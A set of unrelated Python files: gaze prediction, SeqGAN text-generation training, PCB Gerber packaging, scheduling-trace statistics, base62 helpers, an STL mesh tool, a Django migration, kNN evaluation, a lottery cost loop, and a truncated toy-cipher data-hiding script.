f_0_1 = np.reshape(fc_0_1, (5,5))
f_0_m1 = np.reshape(fc_0_m1, (5,5))
gaze_grid_list = [alpha_exponentiate(f_0_0), \
alpha_exponentiate(f_1_0), \
alpha_exponentiate(f_m1_0), \
alpha_exponentiate(f_0_1), \
alpha_exponentiate(f_0_m1)]
shifted_x = [0, 1, -1, 0, 0]
shifted_y = [0, 0, 0, -1, 1]
count_map = np.ones([15, 15])
average_map = np.zeros([15, 15])
for delta_x, delta_y, gaze_grids in zip(shifted_x, shifted_y, gaze_grid_list):
for x in range(0, 5):
for y in range(0, 5):
ix = shifted_mapping(x, delta_x, True)
iy = shifted_mapping(y, delta_y, True)
fx = shifted_mapping(x, delta_x, False)
fy = shifted_mapping(y, delta_y, False)
average_map[ix:fx+1, iy:fy+1] += gaze_grids[x, y]
count_map[ix:fx+1, iy:fy+1] += 1
average_map = average_map / count_map
final_map = imresize(average_map, (227,227), interp='bicubic')
idx = np.argmax(final_map.flatten())
[rows, cols] = ind2sub2((227, 227), idx)
y_predict = rows/227
x_predict = cols/227
return final_map, [x_predict, y_predict]
def alpha_exponentiate(x, alpha=0.3):
return np.exp(alpha * x) / np.sum(np.exp(alpha*x.flatten()))
def ind2sub2(array_shape, ind):
"""Python implementation of the equivalent matlab method"""
rows = (ind / array_shape[1])
cols = (ind % array_shape[1]) # or numpy.mod(ind.astype('int'), array_shape[1])
return [rows, cols]
def shifted_mapping(x, delta_x, is_topleft_corner):
if is_topleft_corner:
if x == 0:
return 0
ix = 0 + 3 * x - delta_x
return max(ix, 0)
else:
if x == 4:
return 14
ix = 3 * (x + 1) - 1 - delta_x
return min(14, ix)
def getGaze(e, image):
"""Calculate the gaze direction in an imageself.
Keyword arguments:
e -- list with x,y location of head
image -- original image
"""
network = loadModel()
image, image_resize, head_image, head_loc = prepImages(image, e)
f_val = predictGaze(network, image_resize, head_image, head_loc)
final_map, predictions = postProcessing(f_val)
x = predictions[0] * np.shape(image)[0]
y = predictions[1] * np.shape(image)[1]
x = int(x)
y = int(y)
return [x,y]
if __name__=="__main__":
start = time.time()
#this main method is for testing purposes
#predictions = getGaze([0.60, 0.2679], 'script/test.jpg')
predictions = getGaze([0.54, 0.28], 'script/5.jpg')
image = imread('script/5.jpg')
fig, ax = fig,ax = plt.subplots(1)
ax.set_aspect('equal')
plt.imshow(image)
ax.add_patch(Circle((predictions[0], predictions[1]),10))
plt.show()
|
import numpy as np
import tensorflow as tf
# import random
from dataloader import Gen_Data_loader, Dis_dataloader
# from generator import Generator
from two_layer_generator import Generator2
from rnn_discriminator import RNNDiscriminator2
from rollout import ROLLOUT
import os
from config import *
def generate_samples(sess, trainable_model, batch_size, generated_num, output_file):
# Generate Samples
generated_samples = []
for _ in range(int(generated_num / batch_size)):
generated_samples.extend(trainable_model.generate(sess))
with open(output_file, 'w') as fout:
for poem in generated_samples:
buffer = ' '.join([str(x) for x in poem]) + '\n'
fout.write(buffer)
def target_loss(sess, gen_lstm, data_loader):
# target_loss means the oracle negative log-likelihood tested with the oracle model "target_lstm"
# For more details, please see the Section 4 in https://arxiv.org/abs/1609.05473
nll = []
data_loader.reset_pointer()
for it in xrange(data_loader.num_batch):
batch = data_loader.next_batch()
g_loss = sess.run(gen_lstm.pretrain_loss, {gen_lstm.x: batch})
nll.append(g_loss)
return np.mean(nll)
def pre_train_epoch(sess, trainable_model, data_loader):
# Pre-train the generator using MLE for one epoch
supervised_g_losses = []
data_loader.reset_pointer()
for it in xrange(data_loader.num_batch):
batch = data_loader.next_batch()
_, g_loss = trainable_model.pretrain_step(sess, batch)
supervised_g_losses.append(g_loss)
return np.mean(supervised_g_losses)
def main():
# random.seed(SEED)
# np.random.seed(SEED)
assert START_TOKEN == 0
gen_data_loader = Gen_Data_loader(BATCH_SIZE)
likelihood_data_loader = Gen_Data_loader(BATCH_SIZE) # For testing
dis_data_loader = Dis_dataloader(BATCH_SIZE)
generator = Generator2(vocab_size, BATCH_SIZE, EMB_DIM, HIDDEN_DIM, SEQ_LENGTH, START_TOKEN,learning_rate=0.03)
discriminator = RNNDiscriminator2(sequence_length=SEQ_LENGTH, nrof_class=2, vocab_size=vocab_size, emb_dim=dis_embedding_dim,
batch_size = dis_batch_size,hidden_dim = 2*HIDDEN_DIM, learning_rate = 0.03)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
# Create Saver
saver_pretrain = tf.train.Saver(max_to_keep=10)
saver = tf.train.Saver(max_to_keep=10)
model_idx = 1
fname = 'model' + str(model_idx)
model_save_path = './Model/' + fname + '/'
while os.path.exists(model_save_path):
model_idx += 1
fname = 'model' + str(model_idx)
model_save_path = './Model/' + fname + '/'
pre_model_save_path = './Model/' + fname + '_pre/'
os.makedirs(model_save_path)
os.makedirs(pre_model_save_path)
# os.makedirs(os.path.join('./log', fname))
pretrain_fname = fname+'_pre'
# First, use the oracle model to provide the positive examples, which are sampled from the oracle data distribution
gen_data_loader.create_batches(positive_file)
# pre-train generator
print 'Start pre-training...'
early_stop_buffer = [10.]*5
for pretrain_cnt, epoch in enumerate(xrange(PRE_EPOCH_NUM)):
loss = pre_train_epoch(sess, generator, gen_data_loader)
if epoch % 2 == 0:
# generate_samples(sess, generator, BATCH_SIZE, generated_num, eval_file)
likelihood_data_loader.create_batches(eval_real_file)
test_loss = target_loss(sess, generator, likelihood_data_loader)
print 'pre-train epoch ', epoch, 'test_loss ', test_loss
early_stop_buffer = early_stop_buffer[1:]
early_stop_buffer.append(test_loss)
if all(early_stop_buffer[0] < np.asarray(early_stop_buffer[1:])):
break
elif all(early_stop_buffer[-1] < np.asarray(early_stop_buffer[:-1])): # save on local min
saver_pretrain.save(sess, os.path.join(pre_model_save_path, pretrain_fname), global_step=epoch, write_meta_graph=False)
metagraph_filename = os.path.join(pre_model_save_path, pretrain_fname + '.meta')
if not os.path.exists(metagraph_filename):
saver.export_meta_graph(metagraph_filename)
saver.restore(sess,tf.train.latest_checkpoint(pre_model_save_path))
print 'Start pre-training discriminator...'
# Train 1 epoch on the generated data and do this for 50 times
for e in range(50):
generate_samples(sess, generator, BATCH_SIZE, generated_num, negative_file)
dis_data_loader.load_train_data(positive_file, negative_file)
for _ in range(3):
dis_data_loader.reset_pointer()
for it in xrange(dis_data_loader.num_batch):
x_batch, y_batch = dis_data_loader.next_batch()
feed = {
discriminator.input_x: x_batch,
discriminator.input_y: y_batch
}
_ = sess.run(discriminator.train_op, feed)
print 'Epoch {}'.format(e)
rollout = ROLLOUT(generator, 0.7)
print '#########################################################################'
print 'Start Adversarial Training...'
early_stop_buffer = [10.] * 6
for total_batch in range(TOTAL_BATCH):
# Train the generator for one step
for it in range(1):
samples = generator.generate(sess)
rewards = rollout.get_reward(sess, samples, SAMP_NUM, discriminator)
feed = {generator.x: samples, generator.rewards: rewards}
_ = sess.run(generator.g_updates, feed_dict=feed)
# Test
if total_batch % 2 == 0 or total_batch == TOTAL_BATCH - 1:
# generate_samples(sess, generator, BATCH_SIZE, generated_num, eval_file)
likelihood_data_loader.create_batches(eval_real_file)
test_loss = target_loss(sess, generator, likelihood_data_loader)
print 'total_batch: ', total_batch, 'test_loss: ', test_loss
# early_stop_buffer = early_stop_buffer[1:]
# early_stop_buffer.append(test_loss)
# if all(early_stop_buffer[0] < np.asarray(early_stop_buffer[1:])):
# break
# elif all(early_stop_buffer[-1] < np.asarray(early_stop_buffer[:-1])): # save on local min
saver.save(sess, os.path.join(model_save_path, fname), global_step=total_batch, write_meta_graph=False)
metagraph_filename = os.path.join(model_save_path, fname + '.meta')
if not os.path.exists(metagraph_filename):
saver.export_meta_graph(metagraph_filename)
# Update roll-out parameters
rollout.update_params()
# Train the discriminator
for _ in range(3):
generate_samples(sess, generator, BATCH_SIZE, generated_num, negative_file)
dis_data_loader.load_train_data(positive_file, negative_file)
dis_data_loader.reset_pointer()
for it in xrange(dis_data_loader.num_batch):
x_batch, y_batch = dis_data_loader.next_batch()
feed = {discriminator.input_x: x_batch, discriminator.input_y: y_batch }
_ = sess.run(discriminator.train_op, feed)
if __name__ == '__main__':
main()
|
from invoke import task
@task(default=True)
def package(c, n="switch-dip"):
c.run("rm -rf order/*", warn=True)
c.run(f"cp out/{n}-F_Cu.gbr order/{n}.GTL")
c.run(f"cp out/{n}-B_Cu.gbr order/{n}.GBL")
c.run(f"cp out/{n}-F_Mask.gbr order/{n}.GTS")
c.run(f"cp out/{n}-B_Mask.gbr order/{n}.GBS")
c.run(f"cp out/{n}-F_SilkS.gbr order/{n}.GTO")
c.run(f"cp out/{n}-B_SilkS.gbr order/{n}.GBO")
c.run(f"cp out/{n}-PTH.drl order/{n}.TXT")
c.run(f"cp out/{n}-NPTH.drl order/{n}-NPTH.TXT")
c.run(f"cp out/{n}-Edge_Cuts.gbr order/{n}.GML")
with c.cd("order"):
c.run(f"zip _.zip {n}*")
c.run(f"mv _.zip {n}.zip")
|
class aborted_tasks:
def __init__(self, index, arrival, proc_time, period, abs_deadline, finished, observed_proc_time):
self.index = index
self.arrival = arrival
self.proc_time = proc_time
self.period = period
self.abs_deadline = abs_deadline
self.finished = finished
self.observed_proc_time = observed_proc_time
class finished_tasks:
def __init__(self, index, arrival, proc_time, period, abs_deadline, finished, observed_proc_time):
self.index = index
self.arrival = arrival
self.proc_time = proc_time
self.period = period
self.abs_deadline = abs_deadline
self.finished = finished
self.observed_proc_time = observed_proc_time
# read trace data into a list of objects
def readIntoList(program, a_list, f_list):
tokens = []
for line in program:
tokens = line.split(":")
if tokens[0] == "a":
a_list.append(finished_tasks(
tokens[1], tokens[2], tokens[3], tokens[4], tokens[5], tokens[6], tokens[7]))
if tokens[0] == "f":
f_list.append(finished_tasks(
tokens[1], tokens[2], tokens[3], tokens[4], tokens[5], tokens[6], tokens[7]))
# calculate avg processing time in a program
def calcAvgProcTime(list, name):
total_proc_time = 0
for i in list:
total_proc_time += int(i.proc_time)
print("Avg proc time for " + name + ":\t" + str("%.2f" %
round(total_proc_time / len(list), 2)))
# calculate avg response time in a program
def calcAvgResponseTime(list, name):
total_response_time = 0
for i in list:
curr_response_time = int(i.finished) - int(i.arrival)
total_response_time += curr_response_time
print("Avg resp time for " + name + ":\t" + str("%.2f" %
round(total_response_time / len(list), 2)))
# calculate avg lateness if late and earliness if early
def calcAvgLateness(list, name):
total_lateness = 0
no_of_late_0 = 0
no_of_late_1 = 0
no_of_late_2 = 0
total_earliness = 0
for i in list:
if(int(i.finished) - int(i.abs_deadline)) > 0:
if(int(i.index) == 0):
no_of_late_0 += 1
elif(int(i.index) == 1):
no_of_late_1 += 1
elif(int(i.index) == 2):
no_of_late_2 += 1
curr_lateness = int(i.finished) - int(i.abs_deadline)
total_lateness += curr_lateness
elif(int(i.finished) - int(i.abs_deadline)) < 0:
curr_earliness = int(i.abs_deadline) - int(i.finished)
total_earliness += curr_earliness
print("Avg lateness for " + name + ":\t" +
str("%.2f" % round(total_lateness / len(list), 2)))
print(f"Task 0 was late {no_of_late_0} times for {name}")
print(f"Task 1 was late {no_of_late_1} times for {name}")
print(f"Task 2 was late {no_of_late_2} times for {name}")
print("Avg earliness for " + name + ":\t" + str("%.2f" %
round(total_earliness / len(list), 2)))
print("\n")
def checkDiff(list, name):
diff0 = 0
diff1 = 0
diff2 = 0
for i in list:
if int(i.proc_time) != int(i.observed_proc_time):
if(int(i.index) == 0):
diff0 += abs(int(i.proc_time) - int(i.observed_proc_time))
if(int(i.index) == 1):
diff1 += abs(int(i.proc_time) - int(i.observed_proc_time))
if(int(i.index) == 2):
diff2 += abs(int(i.proc_time) - int(i.observed_proc_time))
print(f"Total diff for task 0 is {diff0} for {name}")
print(f"Total diff for task 1 is {diff1} for {name}")
print(f"Total diff for task 2 is {diff2} for {name}")
print("\n")
def checkObservedProc(list, name):
obs0 = 0
obs1 = 0
obs2 = 0
proc0 = 0
proc1 = 0
proc2 = 0
count0 = 0
count1 = 0
count2 = 0
for i in list:
if(int(i.index) == 0):
obs0 += int(i.observed_proc_time)
proc0 = int(i.proc_time)
count0 += 1
if(int(i.index) == 1):
obs1 += int(i.observed_proc_time)
proc1 = int(i.proc_time)
count1 += 1
if(int(i.index) == 2):
obs2 += int(i.observed_proc_time)
proc2 = int(i.proc_time)
count2 += 1
# calc avg obs proc time
print(
f"Avg obs proc time for task 0 is {obs0 / count0} for {name}, stated: {proc0}")
print(
f"Avg obs proc time for task 1 is {obs1 / count1} for {name}, stated: {proc1}")
print(
f"Avg obs proc time for task 2 is {obs2 / count2} for {name}, stated: {proc2}")
print("\n")
prog1_edf = open("trace-prog1-edf.data", "r")
prog1_rm = open("trace-prog1-rm.data", "r")
prog2_edf = open("trace-prog2-edf.data", "r")
prog2_rm = open("trace-prog2-rm.data", "r")
aborted_list_prog1_edf = []
aborted_list_prog1_rm = []
aborted_list_prog2_edf = []
aborted_list_prog2_rm = []
finished_list_prog1_edf = []
finished_list_prog1_rm = []
finished_list_prog2_edf = []
finished_list_prog2_rm = []
readIntoList(prog1_edf, aborted_list_prog1_edf, finished_list_prog1_edf)
readIntoList(prog1_rm, aborted_list_prog1_rm, finished_list_prog1_rm)
readIntoList(prog2_edf, aborted_list_prog2_edf, finished_list_prog2_edf)
readIntoList(prog2_rm, aborted_list_prog2_rm, finished_list_prog2_rm)
print("")
print("Processing time: ")
calcAvgProcTime(finished_list_prog1_edf, "edf 1")
calcAvgProcTime(finished_list_prog1_rm, " rm 1")
calcAvgProcTime(finished_list_prog2_edf, "edf 2")
calcAvgProcTime(finished_list_prog2_rm, " rm 2")
print("")
print("Response time: ")
calcAvgResponseTime(finished_list_prog1_edf, "edf 1")
calcAvgResponseTime(finished_list_prog1_rm, " rm 1")
calcAvgResponseTime(finished_list_prog2_edf, "edf 2")
calcAvgResponseTime(finished_list_prog2_rm, " rm 2")
print("")
print("Lateness")
calcAvgLateness(finished_list_prog1_edf, "edf 1")
calcAvgLateness(finished_list_prog1_rm, " rm 1")
calcAvgLateness(finished_list_prog2_edf, "edf 2")
calcAvgLateness(finished_list_prog2_rm, " rm 2")
print("")
print("Obs_proc time proc_time diff")
checkDiff(finished_list_prog1_edf, "edf 1")
checkDiff(finished_list_prog1_rm, "rm 1")
checkDiff(finished_list_prog2_edf, "edf 2")
checkDiff(finished_list_prog2_rm, "rm 2")
print("")
print("Avg obs proc time")
checkObservedProc(finished_list_prog1_edf, "edf 1")
checkObservedProc(finished_list_prog1_rm, "rm 1")
checkObservedProc(finished_list_prog2_edf, "edf 2")
checkObservedProc(finished_list_prog2_rm, "rm 2")
|
import base64
import os
import sys
if os.path.join(os.path.dirname(__file__), "pybase62") not in sys.path:
print('adding pybase62 to sys.path')
sys.path.append(os.path.join(os.path.dirname(__file__), "pybase62"))
try:
from .pybase62 import base62
except:
import pybase62 as base62
def _b62encode_int(s, charset=base62.CHARSET_DEFAULT):
try:
i = int(s)
except ValueError:
print('%s is not an integer' % s)
return s
return str(base62.encode(i, charset=charset)).encode('UTF-8')
def b62decode_int(s):
return str(base62.decode(s.decode('UTF-8'), charset=base62.CHARSET_DEFAULT)).encode('UTF-8')
def b62encode_int(s):
return _b62encode_int(s, charset=base62.CHARSET_DEFAULT)
def b62decode_inv_int(s):
return str(base62.decode(s.decode('UTF-8'), charset=base62.CHARSET_INVERTED)).encode('UTF-8')
def b62encode_inv_int(s):
return _b62encode_int(s, charset=base62.CHARSET_INVERTED)
######
# Base62 <-> Hex
######
def _b62encode_hex(s, charset=base62.CHARSET_DEFAULT):
try:
the_string = s.decode('UTF-8')
b = bytes.fromhex(the_string)
except Exception as e:
print('%s is not in hex.' % the_string)
return s
retval = base62.encodebytes(b, charset=charset)
return str(base62.encodebytes(b, charset=charset)).encode('UTF-8')
def _b62decode_hex(s, charset=base62.CHARSET_DEFAULT):
b = bytearray(s.decode('ASCII'), 'UTF-8')
retval = base62.decodebytes(s.decode('ASCII'), charset=charset)
return base64.b16encode(retval)
def b62encode_hex(s):
return _b62encode_hex(s, charset=base62.CHARSET_DEFAULT)
def b62decode_hex(s):
return _b62decode_hex(s, charset=base62.CHARSET_DEFAULT)
def b62encode_inv_hex(s):
return _b62encode_hex(s, charset=base62.CHARSET_INVERTED)
def b62decode_inv_hex(s):
return _b62decode_hex(s, charset=base62.CHARSET_INVERTED)
|
import sys, struct
I=[
[1,0,0,0],
[0,1,0,0],
[0,0,1,0],
[0,0,0,1]
]
def transpose(matrix):
return [[v[i] for v in matrix] for i in xrange(len(matrix[0]))]
def multmatrix(vector,matrix):
return map(sum, transpose(map(lambda x:[x[0]*p for p in x[1]], zip(vector, transpose(matrix)))))
def applymatrix(facet,matrix=I):
return [multmatrix(facet[0]+[1],matrix)[:3],map(lambda x:multmatrix(x+[1],matrix)[:3],facet[1])]
f=[[0,0,0],[[-3.022642, 0.642482, -9.510565],[-3.022642, 0.642482, -9.510565],[-3.022642, 0.642482, -9.510565]]]
m=[
[1,0,0,0],
[0,1,0,0],
[0,0,1,1],
[0,0,0,1]
]
def emitstl(filename,facets=[],objname="stltool_export"):
if filename is None:
return
f=open(filename,"w")
f.write("solid "+objname+"\n")
for i in facets:
f.write(" facet normal "+" ".join(map(str,i[0]))+"\n outer loop\n")
for j in i[1]:
f.write(" vertex "+" ".join(map(str,j))+"\n")
f.write(" endloop"+"\n")
f.write(" endfacet"+"\n")
f.write("endsolid "+objname+"\n")
f.close()
class stl:
def __init__(self, filename=None):
self.facet=[[0,0,0],[[0,0,0],[0,0,0],[0,0,0]]]
self.facets=[]
self.facetsminz=[]
self.facetsmaxz=[]
self.name=""
self.insolid=0
self.infacet=0
self.inloop=0
self.facetloc=0
if filename is None:
return
self.f=list(open(filename))
if not self.f[0].startswith("solid"):
print "Not an ascii stl solid - attempting to parse as binary"
f=open(filename,"rb")
buf=f.read(84)
while(len(buf)<84):
newdata=f.read(84-len(buf))
if not len(newdata):
break
buf+=newdata
facetcount=struct.unpack_from("<I",buf,80)
facetformat=struct.Struct("<ffffffffffffH")
for i in xrange(facetcount[0]):
buf=f.read(50)
while(len(buf)<50):
newdata=f.read(50-len(buf))
if not len(newdata):
break
buf+=newdata
fd=list(facetformat.unpack(buf))
self.name="binary soloid"
self.facet=[fd[:3],[fd[3:6],fd[6:9],fd[9:12]]]
self.facets+=[self.facet]
facet=self.facet
self.facetsminz+=[(min(map(lambda x:x[2], facet[1])),facet)]
self.facetsmaxz+=[(max(map(lambda x:x[2], facet[1])),facet)]
f.close()
return
for i in self.f:
if not self.parseline(i):
return
def translate(self,v=[0,0,0]):
matrix=[
[1,0,0,v[0]],
[0,1,0,v[1]],
[0,0,1,v[2]],
[0,0,0,1]
]
return self.transform(matrix)
def rotate(self,v=[0,0,0]):
import math
z=v[2]
matrix1=[
[math.cos(math.radians(z)),-math.sin(math.radians(z)),0,0],
[math.sin(math.radians(z)),math.cos(math.radians(z)),0,0],
[0,0,1,0],
[0,0,0,1]
]
y=v[0]
matrix2=[
[1,0,0,0],
[0,math.cos(math.radians(y)),-math.sin(math.radians(y)),0],
[0,math.sin(math.radians(y)),math.cos(math.radians(y)),0],
[0,0,0,1]
]
x=v[1]
matrix3=[
[math.cos(math.radians(x)),0,-math.sin(math.radians(x)),0],
[0,1,0,0],
[math.sin(math.radians(x)),0,math.cos(math.radians(x)),0],
[0,0,0,1]
]
return self.transform(matrix1).transform(matrix2).transform(matrix3)
def scale(self,v=[0,0,0]):
matrix=[
[v[0],0,0,0],
[0,v[1],0,0],
[0,0,v[2],0],
[0,0,0,1]
]
return self.transform(matrix)
def transform(self,m=I):
s=stl()
s.facets=[applymatrix(i,m) for i in self.facets]
s.insolid=0
s.infacet=0
s.inloop=0
s.facetloc=0
s.name=self.name
for facet in s.facets:
s.facetsminz+=[(min(map(lambda x:x[2], facet[1])),facet)]
s.facetsmaxz+=[(max(map(lambda x:x[2], facet[1])),facet)]
return s
def export(self,f=sys.stdout):
f.write("solid "+self.name+"\n")
for i in self.facets:
f.write(" facet normal "+" ".join(map(str,i[0]))+"\n")
f.write(" outer loop"+"\n")
for j in i[1]:
f.write(" vertex "+" ".join(map(str,j))+"\n")
f.write(" endloop"+"\n")
f.write(" endfacet"+"\n")
f.write("endsolid "+self.name+"\n")
f.flush()
def parseline(self,l):
l=l.strip()
if l.startswith("solid"):
self.insolid=1
self.name=l[6:]
#print self.name
elif l.startswith("endsolid"):
self.insolid=0
return 0
elif l.startswith("facet normal"):
self.infacet=11
self.facetloc=0
self.facet=[[0,0,0],[[0,0,0],[0,0,0],[0,0,0]]]
self.facet[0]=map(float,l.split()[2:])
elif l.startswith("endfacet"):
self.infacet=0
self.facets+=[self.facet]
facet=self.facet
self.facetsminz+=[(min(map(lambda x:x[2], facet[1])),facet)]
self.facetsmaxz+=[(max(map(lambda x:x[2], facet[1])),facet)]
elif l.startswith("vertex"):
self.facet[1][self.facetloc]=map(float,l.split()[1:])
self.facetloc+=1
return 1
if __name__=="__main__" and 0:
s=stl("sphere.stl")
for i in xrange(-10,11):
working=s.facets[:]
for j in reversed(sorted(s.facetsminz)):
if(j[0]>i):
working.remove(j[1])
else:
break
for j in (sorted(s.facetsmaxz)):
if(j[0]<i):
working.remove(j[1])
else:
break
print i,len(working)
emitstl("sphereout.stl",s.facets,"emitted_object")
#stl("../prusamendel/stl/mendelplate.stl")
|
# Generated by Django 2.2.10 on 2020-05-12 01:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('servicios', '0016_auto_20200512_0018'),
]
operations = [
migrations.AlterField(
model_name='prestamotienda',
name='faxofi',
field=models.CharField(blank=True, max_length=150, null=True, verbose_name='Telf. Celular'),
),
migrations.AlterField(
model_name='prestamotienda',
name='tlfofi',
field=models.CharField(blank=True, max_length=150, null=True, verbose_name='Telf. Local.'),
),
]
|
import torch
import datasets
from lib.utils import AverageMeter, traverse
import sys
from packages.register import REGISTER
from packages.loggers.std_logger import STDLogger as logger
def NN(net, npc, trainloader, testloader, K=0, sigma=0.1,
recompute_memory=False, device='cpu'):
# switch model to evaluation mode
net.eval()
# tracking variables
correct = 0.
total = 0
trainFeatures = npc.memory
trainLabels = torch.LongTensor(trainloader.dataset.labels).to(device)
# recompute features for training samples
if recompute_memory:
trainFeatures, trainLabels = traverse(net, trainloader,
testloader.dataset.transform, device)
trainFeatures = trainFeatures.t()
# start to evaluate
with torch.no_grad():
for batch_idx, (inputs, targets, indexes) in enumerate(testloader):
logger.progress(batch_idx, len(testloader), 'processing %d/%d batch...')
inputs, targets = inputs.to(device), targets.to(device)
batchSize = inputs.size(0)
# forward
features = net(inputs)
# cosine similarity
dist = torch.mm(features, trainFeatures)
yd, yi = dist.topk(1, dim=1, largest=True, sorted=True)
candidates = trainLabels.view(1,-1).expand(batchSize, -1)
retrieval = torch.gather(candidates, 1, yi)
retrieval = retrieval.narrow(1, 0, 1).clone().view(-1)
yd = yd.narrow(1, 0, 1)
total += targets.size(0)
correct += retrieval.eq(targets.data).sum().item()
return correct/total
def kNN(net, npc, trainloader, testloader, K=200, sigma=0.1,
recompute_memory=False, device='cpu'):
# set the model to evaluation mode
net.eval()
# tracking variables
total = 0
trainFeatures = npc.memory
trainLabels = torch.LongTensor(trainloader.dataset.labels).to(device)
# recompute features for training samples
if recompute_memory:
trainFeatures, trainLabels = traverse(net, trainloader,
testloader.dataset.transform, device)
trainFeatures = trainFeatures.t()
C = trainLabels.max() + 1
# start to evaluate
top1 = 0.
top5 = 0.
with torch.no_grad():
retrieval_one_hot = torch.zeros(K, C.item()).to(device)
for batch_idx, (inputs, targets, indexes) in enumerate(testloader):
logger.progress(batch_idx, len(testloader), 'processing %d/%d batch...')
batchSize = inputs.size(0)
targets, inputs = targets.to(device), inputs.to(device)
# forward
features = net(inputs)
# cosine similarity
dist = torch.mm(features, trainFeatures)
yd, yi = dist.topk(K, dim=1, largest=True, sorted=True)
candidates = trainLabels.view(1,-1).expand(batchSize, -1)
retrieval = torch.gather(candidates, 1, yi)
retrieval_one_hot.resize_(batchSize * K, C).zero_()
retrieval_one_hot.scatter_(1, retrieval.view(-1, 1), 1)
yd_transform = yd.clone().div_(sigma).exp_()
probs = torch.sum(torch.mul(retrieval_one_hot.view(batchSize, -1 , C),
yd_transform.view(batchSize, -1, 1)), 1)
_, predictions = probs.sort(1, True)
# Find which predictions match the target
correct = predictions.eq(targets.data.view(-1,1))
top1 = top1 + correct.narrow(1,0,1).sum().item()
top5 = top5 + correct.narrow(1,0,5).sum().item()
total += targets.size(0)
return top1/total
def get(name):
return REGISTER.get_class(__name__, name)
REGISTER.set_package(__name__)
REGISTER.set_class(__name__, 'knn', kNN)
REGISTER.set_class(__name__, 'nn', NN) |
price = 2 # 单注价格
bonus = 5 # 中奖金额
costs = [] # 总成本
for i in range(20):
current_costs = sum(costs)
times = 1 # 买多少注
while True:
cost = times * price # 本次购买总金额
reward = times * bonus # 本次中奖总金额
costs_total = current_costs + cost # 总成本
if costs_total < reward:
costs.append(cost)
print(i + 1, '='*10, times, '='*10, cost, '='*10, reward, '='*10, costs_total)
break
times += 1
|
import sys
print('|'+('-'*68)+'|' +
'\n| Data_Verification process has been executed successfully. Please |' +
'\n| follow the instructions below! Terminating process earlier might |' +
'\n| leave unnecessary files behind, and might not hide your data. |' +
'\n|'+('-'*68)+'|')
def text2ascii(a_word):
'''
Converts text to ascii with all the required spaces.
Spaces are later converted using hexadecimal values.
Input: users text
Return: text converted to ascii
'''
ascii_store = ''
for i in range(len(a_word)):
ascii_ = str(ord(a_word[i]))
if i != len(a_word): #add spaces to ascii's
ascii_store += ascii_ + ' '
else:
ascii_store += ascii_
return ascii_store
def pumpKey(a_word,k):
'''
Whenever the length of the key is less the length of the text. Key size increases to
to match text size by looping itself
Input: user word and key
Return: larger key
'''
new_k = ''
count = 0
for i in range(len(a_word)):
if count+1 == len(k):
new_k += str(k[count])
count = 0
else:
new_k += str(k[count])
count += 1
k = new_k
return k
def encr_ascii(ascii_x, ascii_k, x):
'''
Encryption example:
1. formula: X_i + K_(i mod(len X)) + 33
2. For example X = hello (h in ascii = 104)
K = maxim (m in ascii = 109)
3. Iteration 1 ---> X_1 + K_(1 mod(5)) + 33 = 1+1+33 = 35 (35 in ascii = '#')
4. Iteration 2 ---> X_2 + K_(2 mod(5)) + 33 = 0+0+33 = 33 (33 in ascii = '!')
5. Iteration 3 ---: X_3 + K_(3 mod(5)) + 33 = 4+9+33 = 40 (46 in ascii = '.')
6. Ecnrypted text for h ---> #!.
'''
encrypt_x = '' #stores encrypted part of the text
count = 0
for i in range(len(ascii_x)):
k_val = int(i % len(x)) # i mod (len X)
count += 1
if count > len(ascii_k): # if out of range, restarts the k_val
k_val = len(ascii_x) - k_val
count = 0
k_mod = int(ascii_k[k_val]) # K_(1 mod (len(x)), K_(2 mod (len(x)) etc.
encrypt = int(ascii_x[i]) + k_mod + 33 # sum up all the previous combinations
encrypt_x += str(chr(encrypt)) # gets the ASCII_Char (symbol/digit/letter etc.)
return encrypt_x
def decr_ascii(encrypt_x, ascii_k, x):
'''
Remark: ASCII_Val ---> converted version from ASCII_Char (from encryption)
Decryption example:
1. formula: ASCII_Val - K_(i mod(len X)) + 33
2. For example from ecnryption function we get: #!(
2.1 # = 35, ! = 33, . = 46
3. Iteration 1 ---> 35 - K_(1 mod(5)) - 33 = 35-1-33 = 1
4. Iteration 2 ---> 33 - K_(2 mod(5)) - 33 = 35-0-33 = 0
5. Iteration 3 ---: 46 - K_(3 mod(5)) - 33 = 46-9-33 = 4
6. Ecnrypted text for 104 ---> h (for hello)
'''
decrypt_x = ''
count = 0
for i in range(len(encrypt_x)):
ascii_ = ord(encrypt_x[i]) #get ascii value
k_val = int(i % len(x)) # i mod (len X)
count += 1
if count > len(ascii_k): # if out of range, restarts the k_val
k_val = len(ascii_x) - k_val
count = 0
k_mod = int(ascii_k[k_val]) # K_(1 mod (len(x)), K_(2 mod (len(x)) etc.
decrypt = ascii_ - k_mod - 33 # minus all the previous combinations
decrypt_x += str(decrypt)
return decrypt_x
def convert2hex(store_a_word):
'''
counts how many times the letter has been converted to hexadecimal.
If the counter becomes the same size as the word, then it gets added
to the list hex_list, and then hex_word resets. Repeats the process
Input: users text
Return: the list hexadecimal values
'''
hex_word = ''
hex_list = []
for i in range(len(store_a_word)): # stores the list of hexes
count = 0
for letter in store_a_word[i]:
count += 1
hex_word += hex(ord(letter))[2:]
if count == len(store_a_word[i]):
count = 0
hex_list.append(hex_word)
hex_word = ''
combined_hex = '' #stores the combination of hexes from hex_list
for i in range(len(hex_list)):
combined_hex += hex_list[i]
return combined_hex
def generate_hexa_table(hexa_word):
'''
generates a hexa_table in the format of .XML file
Input: hexa input
Return: hexa table
'''
hexa_word_table = []
count_max_word = 0
count_max_length = 0
word = ''
for i in range(len(hexa_word)+1):
if count_max_word <= 63: #gets maximum length of the word
word += hexa_word[count_max_length] #creates a word
if (count_max_length + 1) == len(hexa_word): # if the remaining length != 64
hexa_word_table.append(word)
break
count_max_word +=1
count_max_length += 1
else:
hexa_word_table.append(word)
count_max_word = 0 #resets max length
word = ''
return hexa_word_table
def find_data(file, timecode, hexa_word):
'''
takes users file, timecode, and the word in hexadecimal format, and compares with the data inside the
selected timecode.
Input: key, timecode, plaintext
Return: Yes - text is found, No - text is not found
'''
hexa_table = generate_hexa_table(hexa_word)
count_hex = 0
with open(file) as find_data:
accessed_timecode = False #timecode is not found
accessed_data = False #data is not found
data_found = True
data_found_1 = 'no'
for line in find_data:
if (timecode in line) and (len(line) == 26+len(timecode)): #finds the exact timecode
accessed_timecode = True
if (accessed_data == True and accessed_timecode == True and data_found == True): #looks for the data inside the table
word = ''
for i in range(6,len(line)): #skips 6 spaces infront of the hexadecimal values and create a full hexa word
word += line[i]
